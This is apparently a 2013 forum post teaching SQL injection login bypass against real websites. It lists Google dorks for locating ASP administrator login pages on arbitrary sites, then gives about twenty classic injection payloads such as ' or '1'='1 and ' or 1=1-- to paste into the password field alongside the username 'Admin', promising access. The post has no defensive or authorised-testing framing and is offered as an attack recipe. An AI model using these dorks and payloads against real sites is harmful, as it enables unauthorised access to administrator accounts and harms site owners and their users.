List of some sql injection and google dork
08-18-2013,
Post: #1
What is SQL injection?
================
Injecting SQL queries into another database, or using queries to get auth bypass as an admin.
=======================================================
Part 1: Basic SQL injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need to find a site; start by opening Google.
Now we type our dork. Definition of "dork": a search entry for a certain type of site/exploit, etc.
There are a large number of Google dorks for basic SQL injection.
Here are the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now, what to do once we get to our site.
The site should look something like this:

welcome to xxxxxxxxxx administrator panel
username :
password :

So what we do here is, in the username we always type "Admin",
and for our password we type our SQL injection.

Here is a list of SQL injections:

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'
So your input should look like this:

username:Admin
password:'or'1'='1

So click submit and you're in.
NOTE: not all sites are vulnerable.
